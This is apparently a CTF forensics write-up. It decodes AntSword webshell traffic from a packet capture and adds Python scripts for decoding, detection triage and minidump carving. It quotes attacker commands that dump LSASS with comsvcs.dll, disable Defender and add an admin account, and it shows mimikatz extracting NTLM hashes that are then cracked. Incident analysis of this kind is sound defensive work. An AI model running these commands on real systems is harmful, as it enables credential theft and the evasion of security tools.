Download the pcap from the challenge attachment.
# Question 1
What is the password of the administrator account Admin?
After working on it for a while: the first question is easy, a direct search for Admin in the capture already gives it away, but that approach does not scale to the later questions,
so I looked things up and switched methods.
First export the packet dissections as JSON (File > Export Packet Dissections > As JSON); the export contains a field called urlencoded-form.value,
which is the body of each HTTP POST request.
This is AntSword (蚁剑) webshell traffic: the first two characters of each base64-encoded command are junk and have to be removed before decoding.
```
┌──(root㉿kali)-[~/Desktop]
# pull every urlencoded-form.value, drop the 2 junk chars, base64-decode, keep printable lines only
└─# cat mayishangshu.json | grep urlencoded-form.value | awk -F': ' '{print $2}' | tr -d '",' | while read -r line; do echo "${line:2}" | base64 -d 2>/dev/null; echo; done | grep -v '[^[:print:]]' | awk NF ORS='\n' > hacker.txt
```
Contents of hacker.txt (the decoded AntSword commands, in capture order):
```
C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql
C:/
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&copy store.php c:\temp&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Get-MpComputerStatus&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:\windows\system32&echo [S]&cd&echo [E]
cmd
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\windows\config&echo [S]&cd&echo [E]
cmd
cmd
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]
cmd
cmd
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]
cmd
cmd
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /all&echo [S]&cd&echo [E]
cmd
```
Reading the decoded commands in order (the `echo [S]`/`cd`/`echo [E]` tail is AntSword's wrapper that re-reads the working directory after every command, and the bare `cmd` lines are separate form parameters from the same requests), the attacker does recon (whoami, systeminfo, net group/view/share), dumps LSASS with comsvcs.dll, turns off Defender real-time monitoring, and then adds an account with `net user admin Password1 /add`. So the admin account's password is Password1.
flag: flag{Password1}
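The same decoding as a standalone script, added here as an example (not the writeup author's code): it walks a Wireshark/tshark JSON export, strips AntSword's two junk characters, base64-decodes each form value and discards anything that is not valid base64 or not printable, so ordinary login-form POSTs in the same capture are skipped instead of turning into garbage. The export below is constructed to mimic the shape of a `tshark -T json` file; the walker does not depend on the exact nesting, only on the key name. The file name and the two-character junk length are taken from the writeup.

```python
import base64
import json
import string
import sys

# Two commands copied from the decoded AntSword traffic shown above; they are
# used to build the constructed sample export.
SAMPLE_CMDS = [
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]',
]


def antsword_encode(cmd: str, junk: str = "xx") -> str:
    """Mimic the AntSword encoder: two junk characters in front of the base64 body."""
    return junk + base64.b64encode(cmd.encode()).decode()


# Constructed stand-in for a Wireshark "Export Packet Dissections > As JSON" file
# (NOT the challenge capture): one packet object per POST, the form value nested
# under _source/layers roughly where the real export puts it.
SAMPLE_EXPORT = json.dumps([
    {"_source": {"layers": {"urlencoded-form": {
        "urlencoded-form.value": antsword_encode(SAMPLE_CMDS[0])}}}},
    {"_source": {"layers": {"urlencoded-form": {
        "urlencoded-form.value": antsword_encode(SAMPLE_CMDS[1], junk="Q9")}}}},
    # An ordinary login form, not AntSword: must be dropped, not decoded to garbage.
    {"_source": {"layers": {"urlencoded-form": {
        "urlencoded-form.value": "username=Admin&password=hunter2"}}}},
])

PRINTABLE = set(string.printable)


def find_values(node, key="urlencoded-form.value"):
    """Walk the JSON tree and yield every value stored under `key`, at any depth."""
    if isinstance(node, dict):
        for k, v in node.items():
            if k == key:
                yield from (v if isinstance(v, list) else [v])
            else:
                yield from find_values(v, key)
    elif isinstance(node, list):
        for item in node:
            yield from find_values(item, key)


def decode_antsword(value: str, skip: int = 2):
    """Drop the leading junk characters and base64-decode.

    Returns the decoded text, or None when the value is not valid base64 or does
    not decode to printable text (i.e. it was not an AntSword command payload).
    """
    try:
        raw = base64.b64decode(value[skip:], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    text = raw.decode("utf-8", errors="replace")
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def extract_commands(export_json: str, skip: int = 2):
    """Return every decodable AntSword command from a tshark JSON export, in order."""
    packets = json.loads(export_json)
    cmds = []
    for value in find_values(packets):
        decoded = decode_antsword(value, skip)
        if decoded is not None:
            cmds.append(decoded)
    return cmds


if __name__ == "__main__":
    # Real use: python3 antsword_decode.py < mayishangshu.json
    # With no piped input, the constructed sample export is decoded instead.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_EXPORT
    for cmd in extract_commands(data):
        print(cmd)
```

Using `validate=True` is what keeps non-AntSword form bodies out: after dropping two characters, `username=Admin&password=hunter2` is not in the base64 alphabet and is rejected outright rather than decoded into binary noise that the shell pipeline had to filter with `grep -v '[^[:print:]]'`.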
# Question 2
What is the process ID of LSASS.exe?
```
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
```
This command dumps the memory of a process through the MiniDump export of comsvcs.dll; in intranet post-exploitation it is the usual living-off-the-land way to dump LSASS and extract NTLM hashes. The first argument after MiniDump is the PID of the process to dump (then the output path and the dump type `full`),
so 852 is the LSASS PID.
Note that the attacker runs the dump three times with different output paths and, in between, disables Defender real-time monitoring with Set-MpPreference (the first attempt is misspelled, DisableRaltimeMonitoring, and can't have worked). A comsvcs.dll MiniDump of LSASS is typically blocked or flagged by Defender, so this retry-after-tampering sequence is itself a strong detection signal.
flag: flag{852}
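A small triage pass over the decoded command lines, added here as an example (not part of the original writeup): it tags the behaviours seen in this capture, pulls the PID out of every comsvcs.dll MiniDump invocation, and deliberately matches any `Set-MpPreference -Disable*` switch so the attacker's misspelled first attempt is caught as well. The sample lines are copied from the decoded traffic shown above; the rule names and the ATT&CK technique mapping are my own.

```python
import re

# Constructed sample: a subset of the decoded AntSword commands from this
# writeup, in their original order.
SAMPLE_LOG = [
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]',
    r'cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]',
]

# (rule name, ATT&CK technique, regex). Named groups become fields of the hit.
RULES = [
    # rundll32 comsvcs.dll,MiniDump <pid> <out> full: first argument is the dumped PID.
    ("lsass_dump_comsvcs", "T1003.001",
     re.compile(r"comsvcs\.dll\s*,\s*MiniDump\s+(?P<pid>\d+)\s+(?P<path>\S+)", re.I)),
    # Any -Disable* switch, so a misspelled attempt is still reported.
    ("defender_tamper", "T1562.001",
     re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)),
    ("local_account_added", "T1136.001",
     re.compile(r"\bnet\s+user\s+(?P<user>\S+)\s+(?P<pwd>\S+)\s+/add\b", re.I)),
    ("net_recon", "T1069.002 / T1135",
     re.compile(r"\bnet\s+(?:group|view|share)\b", re.I)),
]


def triage(lines):
    """Return one hit dict per (line, rule) match, in line order."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, technique, rx in RULES:
            m = rx.search(line)
            if m:
                hits.append({"line": n, "rule": name, "technique": technique,
                             **m.groupdict()})
    return hits


def lsass_pids(lines):
    """Distinct PIDs passed to comsvcs MiniDump; the LSASS PID for this capture."""
    return sorted({h["pid"] for h in triage(lines) if h["rule"] == "lsass_dump_comsvcs"})


if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h)
    print("MiniDump target PIDs:", lsass_pids(SAMPLE_LOG))
```

Run against the full hacker.txt (`triage(open("hacker.txt").read().splitlines())`) it produces the same picture as reading the file by hand, but as structured records you can forward to a case file or a SIEM.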
# Question 3
What is the password of the user WIN101?
While working on the earlier questions, searching the capture for the keyword LSASS turned up the dump file being downloaded: the response carries an MDMP
file header, and the commands above already showed that LSASS was being dumped,
so extract it from the stream (export the packet bytes).
Because AntSword prepends random characters in front of the file header (here e1c1709),
they have to be deleted before mimikatz can open the file as a minidump.
Then find the NTLM hash for WIN101.
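Stripping the prefix by hand works, but the safer way is to carve from the MDMP signature and check the header before handing the file to mimikatz. The script below is an added example (not from the writeup) that does that and also lists the stream directory, which is a good sanity check that the carve landed on a real MINIDUMP_HEADER and not on a stray "MDMP" string. The sample bytes are constructed: the page's prefix e1c1709 in front of a hand-built header and three empty directory entries; the stream type numbers, header layout and version constant are the documented minidump format.

```python
import struct
import sys

MDMP_SIGNATURE = b"MDMP"
MINIDUMP_VERSION = 0xA793  # low 16 bits of MINIDUMP_HEADER.Version
# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp, Flags (ULONG64) -> 32 bytes, little-endian.
HEADER_FMT = "<4sIIIIIQ"
HEADER_SIZE = struct.calcsize(HEADER_FMT)
DIRECTORY_FMT = "<III"  # MINIDUMP_DIRECTORY: StreamType, DataSize, Rva
MINIDUMP_WITH_FULL_MEMORY = 0x2


def _build_sample() -> bytes:
    """Constructed download body: AntSword junk prefix + minimal minidump."""
    streams = [(7, 0, 0), (4, 0, 0), (9, 0, 0)]  # SystemInfo, ModuleList, Memory64List
    header = struct.pack(HEADER_FMT, MDMP_SIGNATURE, 0x0001A793, len(streams),
                         HEADER_SIZE, 0, 0x65E0F5A0, MINIDUMP_WITH_FULL_MEMORY)
    directory = b"".join(struct.pack(DIRECTORY_FMT, *e) for e in streams)
    return b"e1c1709" + header + directory + b"\x00" * 16


SAMPLE_DOWNLOAD = _build_sample()


def carve_minidump(blob: bytes) -> bytes:
    """Return the bytes from the first MDMP signature onward."""
    off = blob.find(MDMP_SIGNATURE)
    if off < 0:
        raise ValueError("no MDMP signature found in input")
    return blob[off:]


def parse_header(dump: bytes) -> dict:
    """Validate and decode MINIDUMP_HEADER at offset 0."""
    if len(dump) < HEADER_SIZE:
        raise ValueError("input shorter than a minidump header")
    sig, version, nstreams, dir_rva, _checksum, ts, flags = struct.unpack_from(HEADER_FMT, dump, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError("bad signature %r (junk still in front of the header?)" % sig)
    if version & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError("unexpected minidump version 0x%x" % version)
    return {
        "version": version & 0xFFFF,
        "number_of_streams": nstreams,
        "stream_directory_rva": dir_rva,
        "timestamp": ts,
        "flags": flags,
        "full_memory": bool(flags & MINIDUMP_WITH_FULL_MEMORY),
    }


def list_streams(dump: bytes):
    """Stream type of every directory entry, as a second check on the carve."""
    h = parse_header(dump)
    types = []
    for i in range(h["number_of_streams"]):
        stype, _size, _rva = struct.unpack_from(DIRECTORY_FMT, dump,
                                                h["stream_directory_rva"] + 12 * i)
        types.append(stype)
    return types


def fix_dump(src_path: str, dst_path: str) -> dict:
    """Carve the minidump out of an exported download body and write it to dst."""
    with open(src_path, "rb") as f:
        dump = carve_minidump(f.read())
    info = parse_header(dump)  # refuse to write something mimikatz can't open anyway
    with open(dst_path, "wb") as f:
        f.write(dump)
    return info


if __name__ == "__main__":
    if len(sys.argv) == 3:
        print(fix_dump(sys.argv[1], sys.argv[2]))  # e.g. export.bin lsass.dmp
    else:
        carved = carve_minidump(SAMPLE_DOWNLOAD)
        print(parse_header(carved), list_streams(carved))
```

Trailing bytes after the dump (if AntSword appended a suffix too) sit past every RVA in the directory and are ignored by mimikatz, so only the prefix needs removing. Once `lsass.dmp` parses here, `sekurlsa::minidump lsass.dmp` followed by `sekurlsa::logonpasswords` is the next step, as shown below.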
```
┌──(root㉿kali)-[~/Desktop/x64]
└─# wine mimikatz.exe
it looks like wine32 is missing, you should install it.
multiarch needs to be enabled first. as root, please
execute "dpkg --add-architecture i386 && apt-get update &&
apt-get install wine32:i386"
0024:err:winediag:ntlm_check_version ntlm_auth was not found. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
0024:err:ntlm:ntlm_LsaApInitializePackage no NTLM support, expect problems

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords full
Opening : 'lsass.dmp' file for minidump...
...
         * NTLM     : 282d975e35846022476068ab5a3d72df
         * SHA1     : bc9ecca8d006d8152bd51db558221a0540c9d604
         * DPAPI    : 8d6103509e746ac0ed9641f7c21d7cf7
...
```
Crack the NTLM hash (hashcat mode 1000, or an online NTLM lookup):
flag: flag{admin#123}